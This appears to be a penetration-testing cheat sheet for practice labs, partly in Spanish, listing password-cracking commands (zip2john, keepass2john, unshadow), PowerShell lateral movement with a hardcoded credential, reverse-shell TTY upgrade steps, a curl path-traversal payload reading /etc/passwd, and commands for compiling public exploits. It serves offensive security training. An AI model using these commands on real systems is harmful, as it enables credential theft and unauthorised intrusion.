UTILS

Unzip encrypted zips

zip2john file > zip.file john zip.file -wordlist:/wordlistPath

Create user list with names

username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > usernames.txt

Kepass Master Password decode

keepass2john data.kdbx > hash.txt

DECODE BASE64

echo -n "cadena" | base64 -d; echo

CRACK SHADOW TXT

We need the passwd and the shadow file

unshadow passwd.txt shadow.txt > unshadowed.txt

CMD Lateral Movement

$user = "machineName\user"
$password = ConvertTo-SecureString "butterfly!#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName SNIPER -ScriptBlock { whoami }

TTY Treatment

Para poder tener una terminal interactiva debemos seguir estos pasos:

  1. Una vez ganamos acceso al sistema añadimos el siguiente comando:

script /dev/null -c bash

  1. CTRL + Z

  2. Ponemos el siguiente comando:

stty raw -echo; fg

  1. Reseteamos el xterm

reset xterm

  1. Exportamos variables TERM y BASH

export TERM=xterm
export SHELL=bash

  1. Ajustamos el tamaño de la ventana. Para esto deberemos saber el tamaño de nuestra terminal con el comando:

stty size
stty rows x columns y

CURL

Verbose output

curl -v http://<DOMAIN>

POST Method

curl -X POST http://<DOMAIN>

PUT Method

curl -X PUT http://<DOMAIN>

Use --path-as-is to handle /../ or /./ in the given URL

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd

File Upload

curl -F myFile=@<FILE> http://<RHOST>

Detect if CMD or Powershell is used

We can use a handy snippet, published by PetSerAl that displays "CMD" or "PowerShell" depending on where it is executed.

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell

Compile an exploit

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
gcc shocker.c -o shocker

Run binaries in Linux

sudo wine exploit.exe
PreviousProving GroundsNextUseful Files

Last updated